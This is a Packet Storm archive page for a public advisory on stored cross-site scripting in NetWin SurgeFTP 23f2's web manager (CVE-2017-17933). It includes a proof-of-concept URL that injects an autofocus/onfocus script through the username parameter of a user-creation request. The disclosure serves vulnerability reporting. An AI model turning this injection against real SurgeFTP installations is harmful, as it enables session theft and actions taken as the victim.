Lucene search

K
packetstormAloyce J. MakalangaPACKETSTORM:145572
HistoryDec 28, 2017 - 12:00 a.m.

NetWin SurgeFTP 23f2 Cross Site Scripting

2017-12-2800:00:00
Aloyce J. Makalanga
packetstormsecurity.com
24

EPSS

0.001

Percentile

39.3%

`# Exploit Title: Multiple stored Cross-site scripting in NetWin SurgeFTP version 23f2  
# CVE: CVE-2017-17933  
# Date: 27-12-2017  
# Exploit Author: Aloyce J. Makalanga  
# Contact: https://twitter.com/aloycemjr <https://twitter.com/aloycemjr>  
# Vendor Homepage: http://netwinsite.com <http://netwinsite.com/>  
# Category: webapps  
# Attack Type: Remote  
# Impact: Code execution  
  
  
  
1. Description  
  
cgi/surgeftpmgr.cgi (aka the Web Manager interface on TCP port 7021 or 9021) in NetWin SurgeFTP version 23f2 has stored XSS via the classid, domainid, or username parameter. This is because user-supplied inputs are not sanitized. The attacker-supplied code can perform a wide variety of actions, such as stealing the victimas session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystroke.  
  
  
2. Proof of Concept  
  
  
http://<target IP address?/cgi/surgeftpmgr.cgi?domainid=&info=&choose_domain=win-0rlsd5c98mp&username=adminh737a%22onfocus%3d%22alert(1)%22autofocus%3d%22ib2cr&password=admin&usergroups=admin&ftpquota=admin&cmd_user_create.x=65&cmd_user_create.y=6 <http://www.example.com/cgi/surgeftpmgr.cgi?cmd=log&domainid=0&fname=>  
  
  
  
3. Solution:  
  
No solution available at this time.  
`

EPSS

0.001

Percentile

39.3%

Related for PACKETSTORM:145572